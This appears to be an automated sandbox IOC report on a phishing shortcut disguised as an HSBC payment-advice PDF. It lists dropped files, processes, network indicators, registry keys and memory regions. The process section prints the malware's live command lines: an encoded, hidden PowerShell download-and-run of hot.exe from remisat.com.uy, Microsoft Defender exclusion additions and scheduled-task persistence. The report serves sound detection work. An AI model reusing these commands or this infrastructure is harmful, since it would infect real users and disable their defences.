IOC Report
Payment Advice__HSBC Banking.pdf.lnk

loading gif

Files

File Path
Type
Category
Malicious
Payment Advice__HSBC Banking.pdf.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=18, Archive, ctime=Sun Jun 16 18:18:31 2024, mtime=Fri Jul 26 03:50:06 2024, atime=Sun Jun 16 18:18:31 2024, length=245760, window=hidenormalshowminimized
initial sample
malicious
C:\Users\user\AppData\Local\Temp\tmpE952.tmp
XML 1.0 document, ASCII text
dropped
malicious
C:\Users\user\AppData\Roaming\HODoCxSdp.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\PuttyTest777.pif
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.chk
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0x1a25a0b6, page size 16384, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\HODoCxSdp.exe.log
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PuttyTest777.pif.log
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
modified
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1zy55qri.qgb.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2dp1jvjz.432.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2llw0zql.j5t.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ybtkso1.xqh.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dlgirj2j.rpj.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fnout0tx.qs1.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hlpuauit.oxa.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_reosc51j.doy.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xcqjsk1m.f0h.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zfvjlsdp.w0v.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\tmpF9EC.tmp
XML 1.0 document, ASCII text
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
There are 14 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" cMD /c PowErsHell -EX bypAss -nOp -w hidden -eC IAAJAEkATgB2AG8ASwBFAC0AdwBFAGIAUgBlAHEAVQBFAHMAVAAgAC0AVQBSAGkAIAAJAB0gaAB0AHQAcABzADoALwAvAHIAZQBtAGkAcwBhAHQALgBjAG8AbQAuAHUAeQAvAHoAdABpAC8AaABvAHQALgBlAHgAZQAdICAALQBvAHUAVABGAGkATABlACAACQAdICQAZQBuAFYAOgBhAFAAcABkAGEAdABhAFwAUAB1AHQAdAB5AFQAZQBzAHQANwA3ADcALgBwAGkAZgAdICAAIAA7ACAACQBpAE4AdgBvAGsARQAtAGkAVABlAG0AIAAJAB0gJABFAG4AdgA6AGEAcABQAEQAYQB0AEEAXABQAHUAdAB0AHkAVABlAHMAdAA3ADcANwAuAHAAaQBmAB0g
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowErsHell -EX bypAss -nOp -w hidden -eC IAAJAEkATgB2AG8ASwBFAC0AdwBFAGIAUgBlAHEAVQBFAHMAVAAgAC0AVQBSAGkAIAAJAB0gaAB0AHQAcABzADoALwAvAHIAZQBtAGkAcwBhAHQALgBjAG8AbQAuAHUAeQAvAHoAdABpAC8AaABvAHQALgBlAHgAZQAdICAALQBvAHUAVABGAGkATABlACAACQAdICQAZQBuAFYAOgBhAFAAcABkAGEAdABhAFwAUAB1AHQAdAB5AFQAZQBzAHQANwA3ADcALgBwAGkAZgAdICAAIAA7ACAACQBpAE4AdgBvAGsARQAtAGkAVABlAG0AIAAJAB0gJABFAG4AdgA6AGEAcABQAEQAYQB0AEEAXABQAHUAdAB0AHkAVABlAHMAdAA3ADcANwAuAHAAaQBmAB0g
malicious
C:\Users\user\AppData\Roaming\PuttyTest777.pif
"C:\Users\user\AppData\Roaming\PuttyTest777.pif"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PuttyTest777.pif"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HODoCxSdp.exe"
malicious
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HODoCxSdp" /XML "C:\Users\user\AppData\Local\Temp\tmpE952.tmp"
malicious
C:\Users\user\AppData\Roaming\PuttyTest777.pif
"C:\Users\user\AppData\Roaming\PuttyTest777.pif"
malicious
C:\Users\user\AppData\Roaming\HODoCxSdp.exe
C:\Users\user\AppData\Roaming\HODoCxSdp.exe
malicious
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HODoCxSdp" /XML "C:\Users\user\AppData\Local\Temp\tmpF9EC.tmp"
malicious
C:\Users\user\AppData\Roaming\HODoCxSdp.exe
"C:\Users\user\AppData\Roaming\HODoCxSdp.exe"
malicious
C:\Users\user\AppData\Roaming\HODoCxSdp.exe
"C:\Users\user\AppData\Roaming\HODoCxSdp.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\wbem\WmiPrvSE.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
There are 8 hidden processes, click here to show them.

URLs

Name
IP
Malicious
204.10.160.230
malicious
http://www.fontbureau.com/designersG
unknown
http://www.fontbureau.com/designers/?
unknown
http://www.founder.com.cn/cn/bThe
unknown
http://www.fontbureau.com/designers?
unknown
https://contoso.com/License
unknown
http://geoplugin.net/json.gp2
unknown
http://www.tiro.com
unknown
https://g.live.com/odclientsettings/ProdV2.C:
unknown
http://www.fontbureau.com/designers
unknown
http://www.goodfont.co.kr
unknown
https://remisat.com.uy
unknown
http://remisat.com.uy
unknown
http://www.sajatypeworks.com
unknown
http://www.typography.netD
unknown
https://g.live.com/odclientsettings/Prod.C:
unknown
http://www.founder.com.cn/cn/cThe
unknown
http://www.galapagosdesign.com/staff/dennis.htm
unknown
https://g.live.com/odclientsettings/ProdV2
unknown
http://geoplugin.net/json.gp/C
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://www.galapagosdesign.com/DPlease
unknown
http://www.fonts.com
unknown
http://www.sandoll.co.kr
unknown
http://www.urwpp.deDPlease
unknown
http://www.zhongyicts.com.cn
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://www.sakkal.com
unknown
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
unknown
http://nuget.org/NuGet.exe
unknown
http://www.apache.org/licenses/LICENSE-2.0
unknown
http://www.fontbureau.com
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://geoplugin.net/json.gpl
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://go.micro
unknown
https://contoso.com/Icon
unknown
http://crl.ver)
unknown
https://www.chiark.greenend.org.uk/~sgtatham/putty/0
unknown
https://github.com/Pester/Pester
unknown
http://www.carterandcone.coml
unknown
http://geoplugin.net/json.gp
178.237.33.50
http://www.fontbureau.com/designers/cabarga.htmlN
unknown
http://www.founder.com.cn/cn
unknown
http://www.fontbureau.com/designers/frere-user.html
unknown
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
unknown
http://www.jiyu-kobo.co.jp/
unknown
https://remisat.com.uy/zti/hot.exe
192.254.232.209
http://www.fontbureau.com/designers8
unknown
https://aka.ms/pscore68
unknown
There are 41 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
geoplugin.net
178.237.33.50
remisat.com.uy
192.254.232.209

IPs

IP
Domain
Country
Malicious
204.10.160.230
unknown
Canada
malicious
192.254.232.209
remisat.com.uy
United States
178.237.33.50
geoplugin.net
Netherlands
127.0.0.1
unknown
unknown

Registry

Path
Value
Malicious
HKEY_CURRENT_USER\SOFTWARE\Rmc-O7QOC3
exepath
malicious
HKEY_CURRENT_USER\SOFTWARE\Rmc-O7QOC3
licence
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
SlowContextMenuEntries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
There are 8 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
3869000
trusted library allocation
page read and write
malicious
400000
remote allocation
page execute and read and write
malicious
3729000
trusted library allocation
page read and write
malicious
1238000
heap
page read and write
malicious
104A000
heap
page read and write
malicious
471000
remote allocation
page execute and read and write
7FFD9BA60000
trusted library allocation
page read and write
D75AFE000
unkown
page readonly
4E90000
trusted library allocation
page read and write
6F0000
heap
page read and write
A46E000
stack
page read and write
4A4D000
trusted library allocation
page read and write
7E0000
heap
page read and write
1230000
heap
page read and write
27C1000
trusted library allocation
page read and write
1CCF44DD000
heap
page read and write
CC0000
trusted library allocation
page read and write
1CCF44D1000
heap
page read and write
1CC81C31000
trusted library allocation
page read and write
D00000
trusted library allocation
page execute and read and write
9661000
heap
page read and write
CCA000
trusted library allocation
page execute and read and write
16FF0F0E000
heap
page read and write
1010000
heap
page read and write
2630000
heap
page read and write
7FFD9BA80000
trusted library allocation
page read and write
120D000
stack
page read and write
16FEB8FE000
heap
page read and write
1CCF6712000
heap
page read and write
A36E000
stack
page read and write
16FF0CD5000
trusted library allocation
page read and write
4FE0000
trusted library allocation
page read and write
1CCF4720000
heap
page read and write
16FF0D90000
remote allocation
page read and write
1CCF451C000
heap
page read and write
26A0000
heap
page read and write
4D20000
heap
page read and write
1CCF67D9000
heap
page read and write
A00E000
stack
page read and write
16A000
unkown
page readonly
F50000
heap
page read and write
9E7E000
stack
page read and write
7FFD9B870000
trusted library allocation
page execute and read and write
8D8000
heap
page read and write
D1C000
stack
page read and write
A0EE000
stack
page read and write
1CC80001000
trusted library allocation
page read and write
2DCF000
stack
page read and write
6CE000
stack
page read and write
27D4000
trusted library section
page readonly
870000
heap
page read and write
10FD000
stack
page read and write
1CCF621E000
heap
page read and write
16FF0D0A000
trusted library allocation
page read and write
4F8000
stack
page read and write
1CCF4420000
heap
page read and write
7FFD9B754000
trusted library allocation
page read and write
6CF7000
trusted library allocation
page read and write
ABD000
trusted library allocation
page execute and read and write
16FF2000000
heap
page read and write
7FFD9B752000
trusted library allocation
page read and write
16FEC5F0000
trusted library allocation
page read and write
1CCF4460000
trusted library allocation
page read and write
1CC90070000
trusted library allocation
page read and write
A10E000
stack
page read and write
16FF0CD0000
trusted library allocation
page read and write
2773000
trusted library allocation
page read and write
D80000
heap
page read and write
52D0000
trusted library allocation
page execute and read and write
24BFE7E000
stack
page read and write
DB0000
heap
page read and write
7FFD9B910000
trusted library allocation
page execute and read and write
68E000
stack
page read and write
7FFD9BA90000
trusted library allocation
page read and write
AA3000
trusted library allocation
page execute and read and write
16FF0F02000
heap
page read and write
954E000
stack
page read and write
8A0000
heap
page read and write
2680000
trusted library section
page readonly
24C0337000
stack
page read and write
840000
heap
page read and write
12AE000
heap
page read and write
7FFD9B990000
trusted library allocation
page read and write
16FEB828000
heap
page read and write
2770000
trusted library allocation
page read and write
A90000
trusted library allocation
page read and write
7FFD9BA20000
trusted library allocation
page read and write
9650000
heap
page read and write
16FF0C5F000
trusted library allocation
page read and write
7FFD9B80C000
trusted library allocation
page execute and read and write
25DC000
stack
page read and write
6F7E000
stack
page read and write
16FF0D50000
trusted library allocation
page read and write
128F000
heap
page read and write
16FF0BF0000
trusted library allocation
page read and write
6F5000
heap
page read and write
1CC81B6B000
trusted library allocation
page read and write
4EA0000
heap
page execute and read and write
9FCE000
stack
page read and write
24C0438000
stack
page read and write
1CCF44CE000
heap
page read and write
F40000
heap
page read and write
2B3C000
trusted library allocation
page read and write
16FEB8B5000
heap
page read and write
16FEB8AF000
heap
page read and write
1CCF61E0000
heap
page execute and read and write
6D2E000
stack
page read and write
4A3C000
stack
page read and write
3410000
heap
page read and write
389E000
trusted library allocation
page read and write
1CCF5DB0000
heap
page read and write
16FEB906000
heap
page read and write
25FE000
trusted library allocation
page read and write
16FEB610000
heap
page read and write
3AA0000
trusted library allocation
page read and write
B77000
heap
page read and write
16FEB8AA000
heap
page read and write
7FFD9B90A000
trusted library allocation
page read and write
1CCF647B000
heap
page read and write
24C124C000
stack
page read and write
16FF0C20000
trusted library allocation
page read and write
1CCF677D000
heap
page read and write
E74000
trusted library allocation
page read and write
E70000
trusted library allocation
page read and write
5010000
trusted library allocation
page execute and read and write
16FEBE02000
heap
page read and write
D9C000
stack
page read and write
16FF0C93000
trusted library allocation
page read and write
1CC815E1000
trusted library allocation
page read and write
24C063B000
stack
page read and write
471000
remote allocation
page execute and read and write
7FFD9B806000
trusted library allocation
page read and write
4E80000
trusted library allocation
page execute and read and write
16FF0EFD000
heap
page read and write
1CCF5D50000
trusted library allocation
page read and write
1CC81351000
trusted library allocation
page read and write
5277000
trusted library allocation
page read and write
16FF0CB2000
trusted library allocation
page read and write
DFE000
stack
page read and write
E60000
trusted library allocation
page read and write
16FF0D90000
remote allocation
page read and write
16FF0D40000
trusted library allocation
page read and write
D10000
heap
page read and write
EFC000
stack
page read and write
275D000
trusted library allocation
page read and write
16FEB874000
heap
page read and write
6E40000
trusted library section
page read and write
16FEB82B000
heap
page read and write
D5E000
stack
page read and write
1CC8008B000
trusted library allocation
page read and write
4D17000
heap
page read and write
94E000
stack
page read and write
870000
trusted library allocation
page read and write
B67000
heap
page read and write
D74AFE000
unkown
page readonly
7FFD9B970000
trusted library allocation
page read and write
D73E7B000
stack
page read and write
AA4000
trusted library allocation
page read and write
34DB000
heap
page read and write
842000
trusted library allocation
page read and write
4E70000
heap
page read and write
830000
trusted library allocation
page read and write
4E6E000
stack
page read and write
1CC815E4000
trusted library allocation
page read and write
AAD000
trusted library allocation
page execute and read and write
7FFD9B980000
trusted library allocation
page read and write
2FE0000
heap
page read and write
12B3000
heap
page read and write
4CD0000
heap
page read and write
940E000
stack
page read and write
16FF0E8E000
heap
page read and write
16FF0C46000
trusted library allocation
page read and write
FBD000
stack
page read and write
4D10000
heap
page read and write
2F3D000
stack
page read and write
4D3D000
trusted library allocation
page read and write
24BFEFE000
stack
page read and write
4A90000
trusted library allocation
page read and write
5270000
trusted library allocation
page read and write
16FEB8FE000
heap
page read and write
4D63000
heap
page read and write
6D20000
trusted library allocation
page execute and read and write
70FE000
stack
page read and write
5AD000
stack
page read and write
16FF0F06000
heap
page read and write
D759FB000
stack
page read and write
3CC6000
trusted library allocation
page read and write
969000
heap
page read and write
5000000
trusted library allocation
page read and write
24C007D000
stack
page read and write
7FFD9B8F0000
trusted library allocation
page read and write
16FF0EF2000
heap
page read and write
B6C000
heap
page read and write
16FEBDA0000
trusted library allocation
page read and write
16FEBE00000
heap
page read and write
24C053E000
stack
page read and write
7FFD9B760000
trusted library allocation
page read and write
3D7D000
trusted library allocation
page read and write
7FFD9B950000
trusted library allocation
page read and write
CC2000
trusted library allocation
page read and write
2C4E000
stack
page read and write
16FEB89C000
heap
page read and write
382E000
stack
page read and write
ACE000
heap
page read and write
9ECD000
stack
page read and write
16FEB891000
heap
page read and write
1CCF44EF000
heap
page read and write
6CF0000
trusted library allocation
page read and write
9890000
heap
page read and write
1330000
heap
page read and write
84A000
trusted library allocation
page execute and read and write
16FF0C7E000
trusted library allocation
page read and write
4D4E000
heap
page read and write
AC0000
heap
page read and write
66A0000
trusted library allocation
page read and write
9F86000
heap
page read and write
1CCF63E0000
heap
page execute and read and write
9AFD000
stack
page read and write
9ACE000
stack
page read and write
7FE000
stack
page read and write
950F000
stack
page read and write
1CCF4725000
heap
page read and write
6D30000
trusted library section
page read and write
A7F000
stack
page read and write
2BAF000
stack
page read and write
2690000
heap
page read and write
810000
trusted library allocation
page read and write
16FF0E62000
heap
page read and write
2CC0000
heap
page read and write
16FF11D0000
trusted library allocation
page read and write
AB0000
trusted library allocation
page read and write
16FF0B70000
trusted library allocation
page read and write
16FF0CEF000
trusted library allocation
page read and write
16FEB822000
heap
page read and write
1CCF4480000
trusted library allocation
page read and write
880000
heap
page read and write
D7607E000
stack
page read and write
5060000
heap
page read and write
5EA000
stack
page read and write
852000
trusted library allocation
page read and write
16FF0C20000
trusted library allocation
page read and write
16FF0C5C000
trusted library allocation
page read and write
16FF0BFE000
trusted library allocation
page read and write
16FF0CC0000
trusted library allocation
page read and write
1CCF6200000
heap
page read and write
4A49000
trusted library allocation
page read and write
8C0000
trusted library allocation
page read and write
16FF0C62000
trusted library allocation
page read and write
B4B000
stack
page read and write
D90000
heap
page read and write
1CCF4518000
heap
page read and write
12A8000
heap
page read and write
16FF0ED3000
heap
page read and write
823000
trusted library allocation
page execute and read and write
50C0000
trusted library section
page read and write
A1EE000
stack
page read and write
16FEB8B5000
heap
page read and write
16FEB913000
heap
page read and write
70BE000
stack
page read and write
2ECF000
stack
page read and write
8C0000
heap
page read and write
840000
trusted library allocation
page read and write
E76000
trusted library allocation
page read and write
4CD5000
heap
page read and write
7FFD9B9B0000
trusted library allocation
page read and write
B50000
trusted library allocation
page read and write
B70000
heap
page read and write
2744000
trusted library allocation
page read and write
274E000
trusted library allocation
page read and write
66C2000
trusted library allocation
page read and write
7DF482EB0000
trusted library allocation
page execute and read and write
DEE000
stack
page read and write
1CC90001000
trusted library allocation
page read and write
1CCF67A9000
heap
page read and write
1CCF6781000
heap
page read and write
13FF000
stack
page read and write
50B0000
heap
page read and write
1CCF63F0000
heap
page read and write
39DE000
trusted library allocation
page read and write
B00000
heap
page read and write
126E000
heap
page read and write
1CCF65F0000
heap
page read and write
16FF0EF8000
heap
page read and write
16FF0BD0000
trusted library allocation
page read and write
2610000
trusted library allocation
page read and write
970000
heap
page read and write
16FF0C34000
trusted library allocation
page read and write
5310000
trusted library allocation
page read and write
9D3E000
stack
page read and write
7FFD9BAB0000
trusted library allocation
page read and write
D760FE000
unkown
page readonly
987F000
stack
page read and write
9F91000
heap
page read and write
1CCF6A60000
heap
page read and write
D741F7000
stack
page read and write
24C13CB000
stack
page read and write
CD2000
trusted library allocation
page read and write
CC6000
trusted library allocation
page execute and read and write
4A70000
heap
page read and write
F70000
heap
page read and write
16FF0BF0000
trusted library allocation
page read and write
2FCF000
stack
page read and write
3829000
trusted library allocation
page read and write
16FEC450000
trusted library allocation
page read and write
7FFD9B810000
trusted library allocation
page execute and read and write
974000
heap
page read and write
9C3D000
stack
page read and write
16FF0C3D000
trusted library allocation
page read and write
1CC815F1000
trusted library allocation
page read and write
975000
heap
page read and write
16FF0E42000
heap
page read and write
6D6E000
stack
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
1CC80233000
trusted library allocation
page read and write
50D0000
trusted library section
page read and write
E50000
trusted library allocation
page read and write
3801000
trusted library allocation
page read and write
905000
heap
page read and write
9C0E000
stack
page read and write
16FF0CE1000
trusted library allocation
page read and write
7EE30000
trusted library allocation
page execute and read and write
2801000
trusted library allocation
page read and write
1CC8160C000
trusted library allocation
page read and write
1340000
heap
page read and write
260D000
trusted library allocation
page read and write
1CCF6485000
heap
page read and write
24C04BE000
stack
page read and write
4CE0000
trusted library allocation
page read and write
3B58000
trusted library allocation
page read and write
7FFD9BA40000
trusted library allocation
page read and write
27D0000
trusted library section
page readonly
560000
heap
page read and write
D743FE000
stack
page read and write
16FF0EBF000
heap
page read and write
B2D000
heap
page read and write
1CCF6130000
trusted library allocation
page read and write
1CCF43E0000
heap
page read and write
1CCF674B000
heap
page read and write
16FEB86F000
heap
page read and write
1CCF4499000
heap
page read and write
16FF0E4F000
heap
page read and write
16FF0D90000
remote allocation
page read and write
968B000
heap
page read and write
16FF0BE0000
trusted library allocation
page read and write
1CC901B3000
trusted library allocation
page read and write
7FFD9B836000
trusted library allocation
page execute and read and write
1037000
heap
page read and write
BDC000
stack
page read and write
16FF0CE0000
trusted library allocation
page read and write
16FEB902000
heap
page read and write
32E0000
heap
page read and write
2601000
trusted library allocation
page read and write
7FFD9B901000
trusted library allocation
page read and write
332E000
unkown
page read and write
24C00FE000
stack
page read and write
6F00000
trusted library allocation
page read and write
16FEB8A6000
heap
page read and write
25EB000
trusted library allocation
page read and write
CF0000
trusted library allocation
page read and write
336F000
unkown
page read and write
34D0000
heap
page read and write
98BE000
stack
page read and write
24C0000
trusted library allocation
page read and write
16FEC5C1000
trusted library allocation
page read and write
9E8C000
stack
page read and write
96D000
heap
page read and write
1CCF66E8000
heap
page read and write
CD7000
trusted library allocation
page execute and read and write
988D000
stack
page read and write
A32C000
stack
page read and write
16FEB800000
heap
page read and write
16FF0E2E000
heap
page read and write
B77000
heap
page read and write
24C05BE000
stack
page read and write
16FF0D20000
trusted library allocation
page read and write
1CCF44DB000
heap
page read and write
7FFD9B940000
trusted library allocation
page execute and read and write
24C114E000
stack
page read and write
1CCF4490000
heap
page read and write
24C8000
trusted library allocation
page read and write
AEF000
unkown
page read and write
6CFE000
trusted library allocation
page read and write
5260000
trusted library allocation
page read and write
16FF0CD8000
trusted library allocation
page read and write
67A000
stack
page read and write
99CE000
stack
page read and write
8DE000
heap
page read and write
16FEC6F0000
trusted library allocation
page read and write
1FA000
stack
page read and write
16FEB929000
heap
page read and write
99BE000
stack
page read and write
277B000
trusted library allocation
page read and write
16FF0C08000
trusted library allocation
page read and write
4A40000
trusted library allocation
page read and write
1CC81C35000
trusted library allocation
page read and write
16FEB917000
heap
page read and write
AA0000
trusted library allocation
page read and write
B60000
trusted library allocation
page read and write
27E0000
heap
page read and write
24C134E000
stack
page read and write
50AE000
stack
page read and write
16FF0EF6000
heap
page read and write
2751000
trusted library allocation
page read and write
2780000
trusted library allocation
page read and write
AAE000
unkown
page read and write
24C12CC000
stack
page read and write
964F000
stack
page read and write
4D30000
trusted library allocation
page read and write
16FEB88A000
heap
page read and write
7FFD9BA50000
trusted library allocation
page read and write
820000
trusted library allocation
page read and write
16FEB902000
heap
page read and write
24BFFFE000
stack
page read and write
7FFD9BA10000
trusted library allocation
page read and write
6B1E000
stack
page read and write
9D7E000
stack
page read and write
16FEB8AF000
heap
page read and write
24C108E000
stack
page read and write
1CC815FE000
trusted library allocation
page read and write
27A0000
trusted library allocation
page read and write
26B0000
heap
page execute and read and write
24BFF7E000
stack
page read and write
475000
remote allocation
page execute and read and write
272F000
stack
page read and write
33AE000
stack
page read and write
1CCF6437000
heap
page read and write
5040000
trusted library allocation
page read and write
B02000
heap
page read and write
25E0000
trusted library allocation
page read and write
B63000
heap
page read and write
12FE000
stack
page read and write
16FF0C81000
trusted library allocation
page read and write
2757000
trusted library allocation
page read and write
2633000
heap
page read and write
4EC0000
heap
page read and write
24C017D000
stack
page read and write
7FFD9B76B000
trusted library allocation
page read and write
16FF0E21000
heap
page read and write
2428000
trusted library allocation
page read and write
824000
trusted library allocation
page read and write
1CCF6435000
heap
page read and write
6E00000
trusted library allocation
page read and write
52C0000
trusted library allocation
page execute and read and write
24D0000
heap
page read and write
241E000
stack
page read and write
2D70000
heap
page read and write
12A3000
heap
page read and write
8D0000
heap
page read and write
2762000
trusted library allocation
page read and write
D746FE000
unkown
page readonly
1CCF6760000
heap
page read and write
2A01000
trusted library allocation
page read and write
7FFD9B753000
trusted library allocation
page execute and read and write
9CD000
heap
page read and write
16FF0E00000
heap
page read and write
1CCF64CF000
heap
page read and write
7F100000
trusted library allocation
page execute and read and write
4D60000
heap
page read and write
7FFD9B9A0000
trusted library allocation
page read and write
1CCF64AA000
heap
page read and write
24C02BE000
stack
page read and write
4CF0000
heap
page execute and read and write
16FECB70000
trusted library allocation
page read and write
8A0000
heap
page read and write
16FF0CE0000
trusted library allocation
page read and write
46E000
remote allocation
page execute and read and write
16FEBF00000
heap
page read and write
9D8C000
stack
page read and write
99FE000
stack
page read and write
28FA000
trusted library allocation
page read and write
9F70000
heap
page read and write
16FF0D40000
trusted library allocation
page read and write
2760000
trusted library allocation
page read and write
5300000
heap
page read and write
16FF0CE4000
trusted library allocation
page read and write
2844000
trusted library allocation
page read and write
16FF0F10000
heap
page read and write
B73000
heap
page read and write
507E000
heap
page read and write
16FEB813000
heap
page read and write
1CC81AEA000
trusted library allocation
page read and write
AF4000
heap
page read and write
36E9000
trusted library allocation
page read and write
4E00000
heap
page read and write
2FF0000
heap
page read and write
846000
trusted library allocation
page execute and read and write
2F79000
stack
page read and write
6FBE000
stack
page read and write
D740FE000
unkown
page readonly
16FEB88C000
heap
page read and write
16FF0BF8000
trusted library allocation
page read and write
7FFD9BA00000
trusted library allocation
page read and write
273B000
trusted library allocation
page read and write
16FF0CAA000
trusted library allocation
page read and write
1CCF44D7000
heap
page read and write
2730000
trusted library allocation
page read and write
16FF0C10000
trusted library allocation
page read and write
7FFD9BA30000
trusted library allocation
page read and write
85B000
trusted library allocation
page execute and read and write
D742FE000
unkown
page readonly
24CB000
trusted library allocation
page read and write
16FEBF04000
heap
page read and write
16FEBF02000
heap
page read and write
16FF0EC1000
heap
page read and write
5065000
heap
page read and write
90E000
heap
page read and write
1CCF4516000
heap
page read and write
24C01FD000
stack
page read and write
16FEB879000
heap
page read and write
29FC000
trusted library allocation
page read and write
16FF0D30000
trusted library allocation
page read and write
1030000
heap
page read and write
6BF0000
trusted library allocation
page read and write
16FEBE15000
heap
page read and write
1CC81AEC000
trusted library allocation
page read and write
CDB000
trusted library allocation
page execute and read and write
4D00000
heap
page read and write
1CCF5DB5000
heap
page read and write
D744FE000
unkown
page readonly
16FF0C90000
trusted library allocation
page read and write
36C1000
trusted library allocation
page read and write
1CCF6133000
trusted library allocation
page read and write
9F81000
heap
page read and write
1CCF6744000
heap
page read and write
5050000
trusted library allocation
page read and write
E87000
heap
page read and write
978D000
stack
page read and write
16FF0BF2000
trusted library allocation
page read and write
82D000
trusted library allocation
page execute and read and write
24C043E000
stack
page read and write
16FEB85B000
heap
page read and write
1CCF5D40000
heap
page readonly
1CC81811000
trusted library allocation
page read and write
4D57000
heap
page read and write
82000
unkown
page readonly
DB6000
heap
page read and write
6F0F000
trusted library allocation
page read and write
7FFD9BAA0000
trusted library allocation
page read and write
1CCF42E0000
heap
page read and write
7FFD9B9D0000
trusted library allocation
page read and write
4C3D000
stack
page read and write
D73FFE000
stack
page read and write
16FEBF13000
heap
page read and write
1210000
heap
page read and write
640000
heap
